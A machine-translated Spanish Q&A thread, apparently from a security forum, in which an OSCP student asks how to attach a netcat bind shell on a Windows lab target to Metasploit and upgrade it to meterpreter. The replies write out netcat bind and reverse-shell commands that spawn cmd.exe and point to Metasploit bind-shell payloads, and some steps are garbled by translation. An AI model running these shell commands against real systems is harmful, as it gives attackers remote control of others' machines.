Usando msf para conectarse a netcat listener y shell_to_meterperter

Navega tus respuestas
3

¡Lo he intentado durante horas y no he podido hacer algo que debería ser simple!

Tengo una caja con admin (tomando OSCP - nada ilegal). Utilicé un exploit de RDP, obtuve un shell, agregué un usuario, coloqué al usuario en el grupo de administradores y, como me siento, actualmente estoy en un escritorio con un administrador.

Dado - OBJETIVO - 192.168.1.200, tengo un shell de administrador y acceso a rdesktop. Han subido nc.exe

KALI - Mi máquina - 192.168.1.100.

Lo que estoy tratando de hacer es abrir un puerto LISTENING en el TARGET ... c: \ nc -lvp 9999 -e c: \ windows \ system32 \ cmd.exe

... conéctese a ese puerto abierto desde mi caja KALI mientras usa el marco metasploit. Puedo conectarme usando nc 192.168.1.2009999, pero no puedo hacer que la conexión sea una sesión de metasploit.

Luego convierta esta conexión en una sesión de meterpreter usando post / multi / manage / shell_to_meterpreter

¡Gracias!

    
pregunta Dan Miller 21.12.2015 - 23:51
fuente

2 respuestas

2

Lo tengo !!!

enlace

Necesitaba establecer mi receptor de TARGET en el puerto 4444. Luego ejecuto múltiples / manejadores, luego pago las ventanas / shell_bind_tcp

Exploit y me sale el shell. Ctrl-Z para hacer un segundo plano de la sesión, luego ejecute: %código% en la sesión y bam lo puso en marcha!

    
respondido por el Dan Miller 22.12.2015 - 03:08
fuente
1

schroeder es correcto, debe conectarse a él desde su cliente con nc -v 192.168.1.100 4040 (coloque su ip y su puerto) o use un windows/shell/bind_tcp payload de msfconsole y luego actualice la sesión a meterpreter. shell de explotación de explotación a meterpreter

y el segundo thig es, creo que no obtendrá una conexión inversa de su servidor solo por nc -nvl 9090 -e cmd.exe (este comando solo abre el puerto 9090 y redirige cada entrada, salida, a una instancia de cmd y es un "enlace servidor "el -l option is to listen , para generar un servidor inverso con nc debe ejecutar nc -v 10.10.1.10 4040 -e cmd.exe y su máquina como oyente)

    
respondido por el Sarastro 22.12.2015 - 01:41
fuente

Lea otras preguntas en las etiquetas

Introduzca la contraseña para la CLI de Bitcoin ¿Cuál es el beneficio de un túnel SSH frente a un shell Netcat para la comunicación remota?